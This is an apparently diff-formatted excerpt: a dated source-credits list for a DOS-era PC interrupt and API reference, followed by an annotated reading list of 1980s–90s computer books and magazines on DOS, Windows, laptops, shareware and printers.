+Programmer's Reference Manual" (AA-EB46C-TV). Added 10/13/90. + +Carbon Copy Plus API derived from the Carbon Copy Plus user's manual. Added +11/2/90. + +CMC International SCSI driver TARGA.DEV API derived from its source code. +Added 11/2/90. + +Everex Viewpoint VGA calls derived from Everex Viewpoint Owner's Manual and +Reference Guide, version 1.0. Added 11/3/90. + +VESA SuperVGA BIOS 1.1 extensions extracted from VESA standard #VS900602. +Added by Ralf Brown, 12/9/90. + +PCSpool API derived from PC Magazine, Vol 10 Number 1 (Jan 15,1991). Added +12/20/90. + +STARLITE calls derived from _General_Software_Project_STARLITE_Architecture_ +_Specification_, Final Draft, October 1, 1990, provided by Stephen Jones +of General Software. Added by Ralf Brown, 1/5/91. + +Communicating Applications Specification v1.2 information extracted from +"DCA/Intel Communicating Applications Specification Version 1.2" dated 9/27/90 +(Intel part number 301812-004) and available from the Intel BBS at +(503)645-6275. Added by Ralf Brown, 2/23/91. + +TBScanX v2.3 API extracted from the TBScanX documentation (Frans Veldman, +ESaSS B.V., P.O. Box 1380, 6501 BJ Nijmegen, The Netherlands). Added 3/12/91. + +Novell IPX/SPX calls in part from an article by J. Vanderaart in the Dutch +_LAN-Magazine_, issue #1, titled "IPX, de kabel in de knel". Added 3/16/91. + +Replacements for July 1987 info derived from + _80286_and_80287_Programmer's_Reference_Manual, Intel #210498-004 + _IBM_ROM_BIOS_, Ray Duncan, "Programmer's Quick Reference Series" + _DOS_and_BIOS_Functions_Quick_Reference_, Que + _The_MS-DOS_Encyclopedia_, Microsoft Press + _Advanced_MSDOS_, Ray Duncan (first edition, 1986) + _System_BIOS_for_IBM_PC/XT/AT_Computers_and_Compatibles_, Phoenix + Technical Reference Series + _PC_Tech_Journal, December 1984, April 1986, May 1986, and August 1988 + _Programmer's_Journal_, v8 #1 + _Byte_, v12 #12 (1987 Extra Edition) +Information added by Ralf Brown, 3/91. + +John J. Seal's BIOS Window Extension v1.1 API extracted from the May 1986 Dr. +Dobb's Journal. Added by Ralf Brown, 3/23/91. + +Some additional NetWare data structures and flag values from _NetWare_System_ +_Interface_Technical_Overview_ by Novell. Added by Ralf Brown, 3/24/91. + +Alloy ANSK, NTNX, and MW386 calls summarized from information provided by +Joseph G. Souza and Frank Gladu of Alloy Computer Products, Inc. "Alloy and +its employees are not to be held responsible for any errors which may be +contained in the information provided." Added by Ralf Brown, 4/91. + +Windows 3.0 DOSX information from PC Magazine, Feb 26, 1991. Added 4/22/91. + +MultiDOS Plus API summarized from the on-line manual provided by Nanosoft, Inc. +(available on the Nanosoft BBS at 508-650-9552). Added by Ralf Brown, 4/91. + +Replacements for July 1987 networking INT 2A calls gleaned from + _Networking_Software_, ed. Colin B. Ungaro (McGraw Hill), p265. +Added by Ralf Brown, 5/8/91. + +Common Access Method r2.3 calls and data structures extracted from "SCSI-2 +Common Access Method, Transport and SCSI Interface Module, Rev 2.3", dated +February 25, 1991, by the Computer and Business Equipment Manufacturers +Association (CBEMA). Available from the SCSI BBS, (316)636-8700. +Added by Ralf Brown, 6/7/91. + +DOS Protected Mode Interface spec 1.0 calls extracted from _DOS_Protected_ +_Mode_Interface_(DPMI)_Specification,_Version_1.0_, dated March 12, 1991, +Intel Corp. order number 240977-001. Added by Ralf Brown, 6/11/91. + +CD-ROM device driver request headers extracted from "Microsoft MS-DOS CD-ROM +Extensions Hardware-Dependent Device Driver Specification" of 5 Aug 88. +Added by Ralf Brown, 7/25/91. + +Some DOS 5.0 information extracted from _Microsoft_MSDOS_Programmer's_ +_Reference_, ISBN 1-55615-329-5. Added 7/28/91. + +DOS 5.0 task switcher interface and misc other info extracted from _Microsoft_ +_Programmer's_Reference_, ISBN 1-55615-329-5. Added by Ralf Brown, 8/3/91. + +Turbo Debugger hardware breakpoint interface extracted from the Borland C++ 2.0 +file MANUAL.TNT. Added by Ralf Brown, 8/4/91. + +Various and sundry references from Michael Shiels: + Fundamentals of FOSSIL Implementation and Use, Draft Version 4 + August 10, 1987; Vincent E. Perriello, VEP Software + FSC-0015 + Fundamentals of FOSSIL Implementation and Use, Version 5 + February 11, 1988; Rick More, Solar Wind Computing + FSC-0008 + eXtended Memory Specification (XMS), version 2.0 + July 19, 1988; Microsoft Corporation + Virtual DMA Services (VDS), Version 1.00 + Printed July 16, 1990; Microsoft Corporation + Enhanced Expanded Memory Specification (Enhanced EMS), version 2.0 + (020022-001 A), July 1986; AST Research, Quadram Inc., Ashton- + Tate + +Additional video modes extracted from the VPIC v4.6 configuration files. +Added by Ralf Brown, 9/14/91. + +Japanese functions extracted from the January 1992 issue of _Windows/DOS_ +_Developer's_Journal_: + "Japanese Double Byte Character Processing", John G. Nelson, p23. + "Uncovering the NEC-9801 PC", John G. Nelson, p35. +Added by Ralf Brown, 1/2/92. + +Additional SMARTDRV info gleaned from "Programmer's Workbench", Dr. Dobb's +Journal, January 1992. Added by Ralf Brown, 1/4/92. + +Miscellaneous tidbits found in Andrew Rossman's (andyross@infopls.chi.il.us) +INFOPLUS v1.50 of January 1, 1992. Added by Ralf Brown, 1/4/92. + +Da Vinci eMail Dispatcher interface calls were extracted from the +_Da_Vinci_Systems_Dispatcher_Development_Toolkit_ (Revision 2), dated +20 June 1990. Added 1/7/92. + +FaxBIOS calls and structures gleaned from the FaxBios sample source code +including struct/enum .h files (dated 1 October 1991). Added 1/8/92. + +TaskMAX calls extracted from Digital Research Inc.'s DR DOS 6.0 TaskMAX API +document. Added by Ralf Brown, 1/16/92. + +SOLLEX SuperVGA calls extracted from _SOLLEX_Super_VGA_Standard_ (Smos +videO controLLer EXtensions), No. S03-SP-001-01, dated 9/23/91, +copyright Seiko Epson Corp. Added by Ralf Brown, 1/20/92. + +RSIS information was found in "RSIS: Relocated Screen Interface Specification", +available for free from V Communications, Inc. (see below). + +"Strategies for Writing State-of-the-Art TSRs that exploit MS-DOS", Douglas +Boling, Microsoft Systems Journal volume 7 number 1. + +Advanced Power Management calls abstracted from _Advanced_Power_Management_ +_The_Next_Generation_, Version 1.0, by Intel Corporation and Microsoft Corp. +Added by Ralf Brown, 3/31/92. + +PGS1600.DEV info extracted from _PG1600_Display_Adapter,_Installation_and_ +_Reference_ First Edition, November 1987, P/N 0010216-101A by CornerStone +Technology. Added 4/10/92. + +Borland debug info header was found in Borland's _Open_Architecture_Handbook_. +Added by Ralf Brown, 4/14/92. + +Several DR Multiuser DOS (Concurrent CP/M) calls found in "Multiuser DOS for +Control Systems: Part I" by Richard Kryszak, Dr. Dobbs Journal, April 1992. +Added 4/18/92. + +Vanderaart text-windows API found in J. Vanderaart,"The Golden Btriever", LAN +Magazine, July 1990, p. 85. Added 4/18/92. + +SuperVGA v1.2 info from _Super_VGA_BIOS_Extension_, standard #VS911022, +October 22, 1991. Added 5/6/92. + +Additional partition types from a public domain list by Sean Goggin +. Added 5/22/92. + +XMS 3.0 calls were found in XMS30.TXT on the CompuServer MSLANG forum. + +Vanderaart PC Thuis Shell calls extracted from the premiere (June/July 1990) +issue of PC Thuis Power magazine, column "Voorheen Methode Vanderaart" by +John Vanderaart. Added 7/24/92. + +Additional video modes extracted from the VPIC v5.0 configuration files. +Added by Ralf Brown, 8/7/92. + +Details on the NetWare API found in Novell's _NetWare_System_Calls--DOS_, +Volume I and Volume II (item numbers 100-000571-002 and 100-000572-002, +1989). Added by Ralf Brown, 9/92. + +SNAP.EXE v3.2 API culled from the SNAP source code. Added by Ralf Brown, +9/10/92. + +FlashTek X-32VM calls extracted from the X-32VM manual of April 1, 1992. + +Comtrol Hostess i/ISA interrupt usage from the + COMTROL HOSTESS i/ISA Programmer's Reference, First Edition, December 1991 + COMTROL Corporation product number 6978-12/96/91. + +Disk Spool II v4.0x documented API extracted from file SP2INTFC.DOC, included +with the Disk Spool II v4.05.04 distribution. Added by Ralf Brown, 1/22/93. + +Novell Link Support Layer API extracted from Novell's _ODI_Developer's_Guide_ +_for_DOS_Protocol_Stacks_, Rev 1.1 3/18/92. Available for anonymous FTP from +sjf-lwp.novell.com. Added by Ralf Brown, 2/93. + +VADMAD device info from Microsoft KnowledgeBase article Q83012, "Using Auto- +Initialize DMA under Windows" (4/17/92). Added 2/24/93. + +Windows 3.0 Virtual DMA Spec bugs extracted from Microsoft KnowledgeBase +article Q77998, "Errors in the VDS API in Enhanced Mode Windows" (11/8/91). +Added 2/24/93. + +IBMSND driver API info from "Examining PC Audio, welcome to the wild and wooly +world of PC Sound", John W. Ratcliff, DDJ #198 (March 1993), p. 78-85. +Added 3/93. + +UM587 chipset video modes from "IBM VGA-Compatible Video Graphics Controller +User's Manual". Added by Ralf Brown, 5/22/93. + +Cirrus Logic CL-GD 5420/5422/5426 video modes extracted from "V542X (Super VGA) +User Manual". Added by Ralf Brown, 5/22/93. + +Additional Tseng ET-3000 info extracted from "Puretek VGA Ultra Advanced +Graphics Board Operations Guide". Added by Ralf Brown, 5/22/93. + +Additional virus calls extracted from the Computer Virus Catalog maintained +by Prof. Dr. Klaus Brunnstein at +the University of Hamburg. Added by Ralf Brown, 5/25/93. + +Software Carousel API extracted from a technical note dated 1/20/88. Added +6/4/93. + +DIET v1.43e API from DIETAPI.DOC "DIET APPLICATION INTERFACE version 1.43e" +by Teddy Matsumoto, 11/22/91. Added 6/4/93. + +xDISK v3.32+ installation check extracted from the xDISK v3.40 documentation. +Added by Ralf Brown, 6/4/93. + +NetWare Access Server Driver API extracted from "NetWare Access Server +Driver Specification", Version 1.0 (November 17, 1992), Novell part number +107-000018-002. Added by Ralf Brown, 6/12/93. + +Chips&Technologies VGA BIOS INT 10/5Fxx extracted from Programmer's Guide to +EGA and VGA Programming, 2nd edtion. Added 6/24/93. + +Cloaking API based on CLOAKAPI.INC and RMFUNCS.DOC on Netroom Supplemental +Disk. Added by Ralf Brown, 6/24/93. + +Cirrus Logic BIOS info from the Cirrus Logic CL-GD542X Technical Reference +Manual, dated April 1993. Added 7/13/93. + +Some QEMM internal functions documented in Quarterdeck files QDMEM.DOC and +QPI.DOC, dated 6/15/93. Added by Ralf Brown, 7/18/93. + +10NET v5.0 calls and data structures extracted from "10NET 5.0 Implementation +Spec", chapter 5. Added by Ralf Brown, 7/24/93. + +Phar Lap 386|DOS-Extender v4.0/4.1 info extracted from 386DOSX.DOC. Added +7/27/93. + +Novell NetWare 3270 API (INT 6F) extracted from Novell SNA Note 3-133, +"API/HLLAPI INFORMATION", dated March 7, 1991. Added by Ralf Brown, 7/28/93. + +PCMCIA Socket Services from _PCMCIA_Socket_Services_Interface_Specification_, +Revision A.00, dated June 20, 1991. Added by Ralf Brown, 8/30/93. + +MEMORY.LST updates from "IBM Local Area Network Technical Reference" +SC30-3383-03, December 1990 (page D-31), and "IBM PS/2 and PC BIOS Interface +Technical Reference" (September 1991 edition). Added 9/24/93. + +Connection Manager API extracted from _The_Connection_Manager_User's_Guide_, +Third Edition, February 1993. Added by Ralf Brown, 10/18/93. + +NetWare multiplexor (INT 21/AH=F2h) calls from November 1993 _Dr._Dobb's_ +_Journal_ "Undocumented Corner" (Pawel Szczerbina, "The NetWare Core Protocol +(NCP)") and Novell's SC3X04.EXE (available from NOVLIB and ftp.novell.com). +Added by Ralf Brown, 10/26/93. + +Additional Microsoft Mouse driver details from Microsoft Knowledge Base +articles, available for anonymous FTP from ftp.microsoft.com. Added by +Ralf Brown, 10/26/93. + +HLLAPI return codes extracted from Microsoft's _Windows_HLLAPI_Specification_, +version 1.0 (10/6/92). Added by Ralf Brown, 10/31/93. + +Chicago VxD identifiers from "Undocumented Corner", _Dr._Dobb's_Journal_ +December 1993. Added by Ralf Brown, 11/19/93. + +SBSIM (SoundBlaster Simplified Interface Module) API extracted from file +SBSIMDMO.C, distributed along with the other files for _SoundBlaster:_The_ +_Official_Book_. Added by Ralf Brown, 1/22/94. + +Windows debugging kernel calls from _Undocumented_Windows_ and _Windows_ +_Internals_. Added 1/22/94. + +YEA_GUS.EXE and EURO_MOD.EXE APIs from the SPHINX C-- v0.189 example files +GUS.H-- and GUSMOD.H--. Added by Ralf Brown, 1/31/94. + +ZFAX v3 API from the ZFAX v3.01 manual, Appendix D. Added 2/3/94. + +Husky Hunter 16 BIOS from the _Husky_Hunter_16_User_Guide_, 2nd edition (Sept +1991). Added 2/4/94. + +Additional ASPI information from Brian Sawert's ASCILOOK utility, published +in the March 1994 Dr. Dobb's Journal. Added by Ralf Brown, 3/26/94. + +Novell XQL INT 7Bh from XQL C interface source of 7/89. Added by Ralf Brown, +3/94. + +Various PS/1 and DOS/V calls were found in Frank van Gilluwe's book +_The_Undocumented_PC_, Addison-Wesley 1994. ISBN 0-201-62277-7. Added by +Ralf Brown, 4/16/94. + +Various ports and miscellaneous data structure were found in Frank van +Gilluwe's book _The_Undocumented_PC_, Addison-Wesley 1994. ISBN 0-201-62277-7. +Added by Ralf Brown, 6/5/94. + +Compaq QVision info from the _COMPAQ_QVision_Graphics_System_Technical_ +_Reference_Guide_, second edition (October 1993). Compaq part number +073A/0693. Added by Ralf Brown, 7/31/94. + +Cloaking v1.01 info from the Cloaking(tm) Developer's Toolkit, first edition +(October 1993), provided by Helix Software. Helix part number N04,1093. +Added by Ralf Brown, 8/94. + +K3PLUS API from the K3API.DOC file v2.04 for K3PLUS. Added by Ralf Brown, +8/7/94. + +QEMM port-trapping API extracted from the QEMM v7.5 manual. Added by +Ralf Brown, 10/22/94. + +IBM 8514/A and XGA Adapter Interface calls extracted from Richard F. Ferraro's +_Programmer's_Guide_to_the_EGA,_VGA,_and_Super_VGA_Cards_, third edition. +Added by Ralf Brown, 10/94. + +Enhanced Disk Drive Specification calls and tables from Phoenix Technologies' +_Enhanced_Disk_Drive_Specification_,_Version_1.0_, dated January 25, 1994. +Added 10/94. + +VSWITCHD VxD API from "Q&A MSDOS" column by Jeff Prosise in the September 1994 +_Microsoft_System_Journal_. SHELL VxD API from "Windows Questions and +Answers", _Windows/DOS_Developer's_Journal_, August 1994. POSTMSG VxD API +from "Q&A MSDOS", _Microsoft_Systems_Journal_, November 1994. Added 11/5/94. + +VESA Audio Interface calls from the VBEAI SDK include files. Added 1/3/95. + +VESA SuperVGA BIOS v2.0 calls gleaned from SVGAKit v5.1beta1 by SciTech +Software. Added by Ralf Brown, 1/6/95. + +PCMCIA ExCA function names from "Programmer's Guide to the AMIBIOS", +ISBN 0-07-001562-7, page 395. Added 1/7/95. + +Hewlett Packard EX-BIOS functions extracted from the _HP_Vectra_AT_Technical_ +_Reference_Manual_,Vol_2:_System_BIOS_, first edition, September 1985. Added +1/95. + +Plug-and-Play BIOS specs extracted from _Plug_and_Play_BIOS_Specification_ +_Version_1.0A_ (May 5, 1994). Added by Ralf Brown, 3/4/95. + +Extended System Configuration Data formats extracted from _Extended_System_ +_Configuration_Data_Specification_Version_1.01_ (December 28, 1993). +Added by Ralf Brown, 3/5/95. + +Plug-and-Play Configuration Manager API extracted from _Plug_and_Play_Device_ +_Driver_Interface_Version_1.0C_ (October 5, 1993). Added by Ralf Brown, +3/6/95. + +Comments about PC LAN Program from _IBM_PC_Local_Area_Network_Program_User's_ +_Guide_ Third edition (April 1987, for Release 1.2). Added 3/17/95. + +QRIP API extracted from QRIPTECH.TXT in RIPCPP10.ZIP (C++ class library for +using QRIP/TSR). Added 3/17/95. + +AMI BIOS-FLASH interface from "AMIFLASH - Flash Implementation Guide", +available as FLASH110.ZIP on American Megatrends' BBS and FTP sites. +Added 3/31/95. + +Many Windows VxD function numbers extracted from PharLap's PHARLAPX header +file PHAR386.H. Added by Ralf Brown 4/14/95. + +PHARLAPX VxD API extracted from PharLap's +ftp.pharlap.com:/pub/286dosx/pharlapx.zip. Added by Ralf Brown, 4/14/95. + +Intel SMBus info from _Intel_System_Management_Bus_BIOS_Interface_ +_Specification_, _Revision_1.0_, February 15, 1995, by Intel Architecture +Labs. Added 5/14/95. + +Various Novell NetWare info available at +ftp://ftp.urz.uni-heidelberg/pub/novell/unsupported; SC4X01.ZIP info (many +NetWare INT 21/F216h,F217h,F268h,F27Bh subfunctions; written by Wolfgang +Schreiber) added 8/95. + +Pentium Local APIC info from _Pentium_Processor_System_Architecture_ (second +edition), by MindShare, Inc. (Addison-Wesley 1995, ISBN 0-201-40992-5). +Added by Ralf Brown, 9/8/95. + +ATA-2 info from _AT_Attachment_Interface_with_Extensions_(ATA-2)_, +Revision 3 (January 17, 1995), document of the X3T10 standardization +committee. Added 9/9/95. + +ATA-3 info from _AT_Attachment-3_Interface_(ATA-3)_, Revision 1 (April 25, +1995), document of the X3T10 standardization committee. Added 9/9/95. + +Enhanced Disk Drive Spec v1.1 (and INT 13 Extensions v2.1) from +_Enhanced_Disk_Drive_Specification_Version_1.1_, January 26, 1995. +Added 9/10/95. + +Bootable CD-ROM info from _"El Torito"_Bootable_CD-ROM_Format_Specification_ +Version 1.0, November 14, 1994, by Phoenix Technologies and IBM. +Added 9/10/95. + +PCI configuration info from _PCI_System_Architecture_ (third edition), by +MindShare, Inc. (Addison-Wesley 1995, ISBN 0-201-40993-3). +Added by Ralf Brown, 9/10/95. + +Most PCI vendor IDs from Linux v1.3.25 include/linux/pci.h by Drew Eckhardt, +dated 9/8/95. Added by Ralf Brown, 9/15/95. + +EPP BIOS Revision 7 from _IEEE_1284_Enhanced_Parallel_Port_BIOS_Specification_, +Revision 7, dated 3/9/94. Added by Ralf Brown, 9/17/95. + +Many additional NetWare functions (particularly NCP calls) from Chapters 1-8 +and portions of Chapters 9-15 of the NetWare API reference available online +from www.novell.com. Added by Ralf Brown, 9/95 and 10/95. + +Multiprocessor Specification info from _Multiprocessor_Specification_, +Version 1.4, July 1995 (Intel order number 242016-004, available online from +www.intel.com). Added by Ralf Brown, 9/20/95. + +Smart Battery protocol info from _Duracell_Intel_Smart_Battery_Data_ +_Specification_, Revision 1.0, February 15, 1995. +Added by Ralf Brown, 9/21/95. + +Additional Plug-and-Play info from _Plug_and_Play_System_Architecture_, by +MindShare, Inc. (Addison-Wesley 1995, ISBN 0-201-41013-3). +Added by Ralf Brown, 9/23/95. + +PCI BIOS v2.1 info and more-complete PCI vendor ID list from _Programming_ +_Plug_and_Play_, James Kelsey, Sams Publishing 1995. ISBN 0-672-30703-0. +Added by Ralf Brown, 10/95. + +Yet more PCI vendor IDs extracted from Intel PCD Systems Engineering's +PCI.EXE v2.2. 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Comprehensive laptop and + portable computer edition. Available at most public libraries. A + classic, MASSIVE edition providing laptop purchasing tips, + detailed reviews concerning specific portable computers and a + surprising amount of software information for laptop users. Also + contains a guide of useful travel tips and secrets from the + magazine editors who use laptops daily at work. + + The Complete Laptop Computer Guide by David H. Rothman. + Everything from equipment you can buy at Radio Shack so you can + hook your laptop into hotel telephone networks to the + eccentricities of using a laptop computer in Egypt. This one is + the best guide if you want to know about using modems and + telecommunications with a laptop under ANY travel conditions + ANYWHERE on planet earth! + + On the Road. The portable Computing Bible, by Jim Seymour. + Detailed laptop and portable use guide. Clever tips and tricks + the manufacturer forgot to put in your insturction manual! + Jim has been a writer for PC Magazine for years and shares some + surprising information for laptop users and buyers. Tips and + tricks from a laptop guru who uses a laptop daily. + + The Complete Laptop Computer Guide: How to Choose and Get the + Most Out of Your Portable PC or Mac, by David H. Rothman. + 384 pages. Large and quite detailed. Covers both hardware and + software resources for portable computer users. + + The Little Laptop Book, by Steve Cummings. Peachpit Press. 186 + pages. How to use, buy and travel with laptops. Extensive + software recommendation and research is offered. Clever ideas + not seen in other books. + + PC Magazine Guide to Notebook and Laptop Computers, by Bob + Howard. Hundreds of productivity tips, purchasing suggestions + and a disk of shareware and public domain software round out + this comprehensive book. The disk alone is worth the price of + the book since the software is especially tuned for laptops. + + ---------------------------------------------------------------- + + WINDOWS + + ---------------------------------------------------------------- + + There are dozens of books out there about Microsoft Windows, but + for my money the best collection of articles and tips ever + published on using Windows is at your local library: obtain a + back issue of PC/Computing Magazine, November 1992. Over 174 + pages of Windows power tips that even the most jaded computer + guru will find amazing. The best coverage of Windows ever done + in any publication. + + ---------------------------------------------------------------- + + GENERAL INTEREST BOOKS + + ---------------------------------------------------------------- + + Understanding Computers (multiple volume series) By editors of + Time-Life Books. 1985. Reader information service, 541 North + Fairbanks Court, Chicago, Ill 60611. Found in most libraries, + this multiple volume set of lavishly illustrated computer guides + covers topics such as computer security, data input, + programming, computer history, new technology and other topics. + + Managing Your Hard Disk. Don Berliner. 1988 Que Publishing. + Topics include installing and formatting a hard disk, learning + about subdirectories, backup methods plus many tips, tricks and + traps in using the all essential hard drive in your PC. + + Next, the popular "Build Your Own...And Save A Bundle" series: + + Build Your Own IBM Compatible and Save A Bundle + Upgrade Your Computer And Save A Bundle + Build Your Own 80286 And Save A Bundle + Build Your Own 80386 And Save A Bundle + Build Your Own 80486 And Save A Bundle + + Above books by Aubrey Pilgrim. TAB-McGraw-Hill Publishing. Order + via toll free telephone number 1-800-765-1714. This series of + books features detailed photos, notes, diagrams and PLAIN ENGLISH + instructions on how to assemble or upgrade a complete computer + system. Save hundreds of dollars on equipment. Over 200,000 + copies sold of this popular series. Incidentally, you can obtain + a free catalog listing the TAB-McGraw-Hill computer books by + calling 1-800-822-8138. + + The Printer Bible. Scott Foerster, Que Corporation, 1990. This + is by far the biggest and best book ever written on using ANY + type of printer effectively. How to fully use, buy, maintain, + upgrade everything from the humble dot matrix printer to the + flashiest laser. Contains a thorough review of printer + technology, comprehensive charts, installation tips, postscript, + ribbons, ink technology! + + Using 123. 1989 Que Publishing. With over one million copies + sold, this is the number one choice in Lotus 123 guides. + Includes basics of command structure, installation, spreadsheet + template examples, graphing, traps and techniques for advanced + use, menu structure, effective macro use and much more. 837 + pages. + + Dvorak's Guide to PC Telecommunications. John Dvorak and Nick + Anis. 1990 McGraw-Hill. At over 1037 pages this is the essential + book for those interested in learning about modems, bulletin + board systems, E-Mail, Compuserve or anything related to + computers and telecommunications. Contains two disks with useful + programs such as Telix, CED, Shez, PKZip, Modem Tutor, and + others which compliment the text section of the book. Appendix + sections include the Hayes AT command set and hundreds of BBS + telephone numbers plus discount coupons for products and + services. + + The Joy of Computer Communications. William Cook. 1984 Dell + Publishing. + + Inc. Magazine's Databasics: Your Guide to Online Business + Information. 1986. Garland Publishing. + + The Complete Handbook of Personal Computer Communications: + Everything you need to go online with the world. Alfred + Glossbrenner. 1987 St Martin's Press. + + The PC Configuration Handbook. John Woram. 1991 Bantam Computer + Books. The total guide to troubleshooting hardware related + problems. A 768 page resource rich with notes on tests such as + configuration of laser printers and other hardware setup needs. + + The Winn Rosch Hardware Bible. Winn L. Rosch. 1991 Brady Computer + Books. A hands on approach to repairing and troubleshooting PC + problems. Including printers, memory, keyboards, software + settings and more. 628 pages. + + The Laserjet Handbook. Steven Bennett. 1991 Brady computer + Books. 518 pages with a utility diskette for information on the + care and feeding of the HP Laserjet printer. + + Using PFS: First Choice. George Omura. 1988 Sybex. A thorough + beginners guide to mastering the First Choice integrated program + which is popular with those needing a single program which + contains a word processor, spreadsheet, database, report + generator, graphics and telecommunications package. + + Using Wordstar. Steve Ditlea. 1988 Que. Wordstar users will + delight in over 600 pages of tips on this classic word + processing package. Covers installation, editing, printing, + command structure, mail-merging techniques, spell-checking, + macros and much more. Also includes tips on using this classic + word processor with other packages such as 123 and PC-Outline. + + Recommeded Wordperfect Resources: + + Wordperfect 5.1 Tips, Tricks and Traps. Charles Stewart III + Wordperfect 5.1 made Easy. Mella Mincberg + Wordperfect 5.1: The Complete Reference. Karen Acerson + Wordperfect 5.1 Macros and Templates. Gordon McComb + Wordperfect Desktop Publishing in Style. Daniel Will-Harris + Wordperfect 5.0 Instant Reference. Greg Harvey + + Computer Viruses, Worms, Data Diddlers, Killer Programs and + other Threats to Your System. John McAfee and Colin Haynes. 1989 + St Martins Press. Written by the chairman of the Computer Virus + Industry Association, this book presents a chillingly detailed + look at viruses. Includes actual programming code for two virus + samples as well as detailed reviews of software protection + programs, computer security methods and historical anecdotes + about virus infections in corporate and university settings. + + Computer Viruses. Ralph Roberts. 1988 Chilton Books. Discusses + many known viruses, how they work, telephone and sources for + help and virus antidotes. + + IBM XT Clone Buyers Guide and Handbook + IBM AT Clone Buyers Guide and Handbook + 386 Buyers Guide and Handbook + + By Edwin Rutsch. 1988. Modular Information Systems. This trilogy + of books cover computers of all major categories in the IBM clone + world. Buy an edition which is six months or less old; frequent + updates are common. Back issues of PC Magazine also review + computers and recommend "editor's choices" and best buys in most + classes of IBM clone computers. + + Dr. File Finder's Guide to Shareware by Michael Callahan and + Nick Anis. ISBN: 0-07-881646-7. A book and disk package teaching + you how to find and use the best in shareware. Learn about disk + vendors, computer club sources, the best shareware in 20 + categories. Includes such popular programs as Qmodem, Dos line + editor, Anarkey, MackMail and more. Two additional disks + available upon submission of a postcard contained in the book. + + Writing & Marketing Shareware - a book and companion cassette + tape by Steve Hudgik, HomeCraft, P.O. Box 974, Tualatin, OR + 97062. Tel 503/692-3732. The best book in the industry for + learning about programming, designing and MARKETING shareware + for maximum financial return. Shows you how to become a + successful shareware author who develops WINNING shareware for + maximum income. Includes mailing list of distributors, equipment + suppliers, service providers, how to design your shareware and + more! + + $hareware Marketing $ystem. Two disk set containing tutorials + and quarterly marketing newsletter for shareware authors plus + dBase format mailing list on disk of over 4,000 addresses for + industry contacts: computer clubs, disk vendors, magazine writers + and more who use, distribute or review shareware. The mailing + list on disk is ready to import into many database software + packages and print mailing labels directly. By Jim Hood, the + author of THIS tutorial! POB 1506, Mercer Island, WA 98040. + 206/236-0470. + + Alfred Glossbrenner's Master Guide to Free Software and + Shareware, c/o FireCrystal Communications, 699 River Rd, + Yardley, PA 19067. One of the largest and most respected guides + to shareware in the industry. Editor is a contributor to + computer industry magazines. + + Tips and Techniques for Using Low-Cost and Public Domain + Software. John Gliedman. 1988. McGraw-Hill. A thorough guide to + low cost, effective shareware and public domain programs + including RAM disks, word processors, batch file systems, hard + disk managers, tutorials and other topics. + + Fire in the Valley, Paul Freiberger and Michael Swaine, Berkeley + California, Osborne/McGraw-Hill, 1984. The classic pre-history + of the early days of personal computers. Colorful, animated and + witty discussion about the makers of the personal computer + revolution. + + Hackers: Heroes of the Computer Revolution, Steven Levy, New + York: Doubleday, 1984. A fascinating look at the early computer + hacker culture in the days at MIT. A great book to curl up with + on a long rainy weekend! + + The Joy of Computers, Peter Laurie, London: Hutchinson, 1983. + + The Computer Glossary, Alan Freedman, 1989, AMACOM. Find out + exactly what determines the difference between a pixel and a + TSR. Thousands of terms explained in a savvy and witty manner. + + The Elements of Style, William Strunk and EB White, 1979, + Macmillan. This little book is a classic for writers and + communicators alike. For those who aspire to write simply, + cleanly and well, the is the little book which should accompany + all word processing packages. Learning the precepts of this + book requires a lifetime of practice and reward you + with text which explains, delights and clarifies. + + Zen and the Art of Motorcycle Maintenance, Robert Pirsig, 1977, + Bantam Books. Understanding how YOU fit in with computers means + understanding the philosophy and history of computers. A non- + technical look at using high technology to tinker effectively + and adapt to the pleasures of life in this electronic age. + + History of Programming Languages, Richard Wexelblat, New York: + Academic Press, 1981. + + The Elements of Spreadsheet Style, John Nevison, 1987, Brady + Books. The essentials of proper construction and use of + spreadsheets. Years later you can come back to the spreadsheet + you designed for a complex budget report and know WHAT and HOW + it works plus WHERE the formulas are. Packed with exceptional + techniques for using these marvelous number crunching programs. + + Home Businesses Under $5000. Joyce Lain Kennedy. Sun Features + Inc. POB 368, Cardiff, CA 92007. (cost: $4.50). Everyone who + owns a computer wonders if there isn't a way to start their own + small business out of the den or garage and use the computer to + make money rather than punch a time clock for the boss. This 36 + page booklet is a practical guide with tips for starting + everything from a mail list maintenance business to a pet + portrait business. $4.50 and a self stamped (75 cents) self- + addressed envelope. + + Windows 3.0: A Self-Teaching Guide. Keith Weiskamp and Saul + Aguiar. 1991. Published by John Wiley and Sons. The ins and outs + of installing and running windows from the ground up for the + novice. + + ---------------------------------------------------------------- + + DOS OPERATING SYSTEM BOOKS + + ---------------------------------------------------------------- + + PC Magazine DOS Power tools, 1991, Bantam - includes 2 disks + with utilities. Probably the ultimate DOS book for those willing + to roll up both shirtsleeves and crawl under the hood for a + "nuts and bolts" understanding of the PC. Batch files, DOS, + DEBUG, the works! $40 but available at discount from many + bookstores. The disks of software utilities are worth the price + of the book. 1251 pages! + + Running MS-DOS (2nd edition), Van Wolverton, 1985, Microsoft + Press + + Quick Reference guide to MS-DOS, Van Wolverton, 1987, Microsoft + Press + + Peter Norton's DOS Guide (rev. edition), Peter Norton, 1987, + Brady Books Also responsible for the essential software utility + toolkit of the same name, Peter Norton takes you on a friendly + and detailed tour of setting up shop and getting results + quickly. + + Tricks of the MS-DOS Masters, John Angermeyer, 1987, Howard Sams + & Co. + + MS-DOS Bible, Steven Simrin, 1985, Howard W. Sams and Company + (Division of Macmillan Inc. Publishers) + + ---------------------------------------------------------------- + + COMPUTER MAGAZINES + + ---------------------------------------------------------------- + + PC MAGAZINE (at most newstands) The preferred magazine for + businesses and serious hobbyists. This is the one to subscribe + to if you can afford the financial and time committment to only + ONE computer magazine. The best and most detailed equipment and + software reviews in the industry. Back issues at most libraries + are ESSENTIAL goldmines for beginner and advanced alike. + Software utilities published by PC Magazine and available + through most computer clubs and PC Magazine MagNet (modem + service) are instant classics. + + SHAREWARE MAGAZINE. Published by PC-SIG, 1030-D East Duane + Avenue, Sunnyvale, CA 94086. Voice telephone: 408/730-9291 FAX: + 408/730-2107. Included with membership in PC-SIG, one of the + largest shareware disk distributors in the world. A bimonthly, + "light and lively" guide to the shareware market featuring + reviews and articles on the best and latest. + + COMPUTER SHOPPER (at most newstands) A monthly review of mail + order and deep discount computer sources. The largest and most + detailed pc purchasing guide in existence. Contains updates on + new software, discount computer reviews, news articles, listings + of local computer clubs and mail order sources for shareware. + Page after page of mail order ads offer tremendous diversity and + equipment choice. + + HOME OFFICE COMPUTING combines computers with topics and + techniques for working at home including equipment 